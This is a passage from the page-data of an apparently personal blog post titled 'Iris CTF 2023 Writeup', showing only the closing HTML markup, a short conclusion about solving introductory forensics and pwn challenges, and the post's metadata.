style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"conclusion\" style=\"position:relative;\"><a href=\"#conclusion\" aria-label=\"conclusion permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Conclusion</h2>\n<p>Everything I solved this time was introductory, so the solution ideas themselves came to me fairly smoothly, but I still spent quite a bit of time actually retrieving the flags because I was short on practical skill.</p>\n<p>I hope to keep working steadily on CTFs this year as well, so here’s to another good year.</p>","fields":{"slug":"/ctf-irisctf-2023-en","tagSlugs":["/tag/forensic-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2023-01-09","description":"Iris CTF 2023 Writeup","tags":["Forensic (en)","Pwn (en)","English"],"title":"Iris CTF 2023 Writeup","socialImage":{"publicURL":"/static/1a83fb6c810f5e30eb9d181b86425046/ctf-irisctf-2023.png"}}}},"pageContext":{"slug":"/ctf-irisctf-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}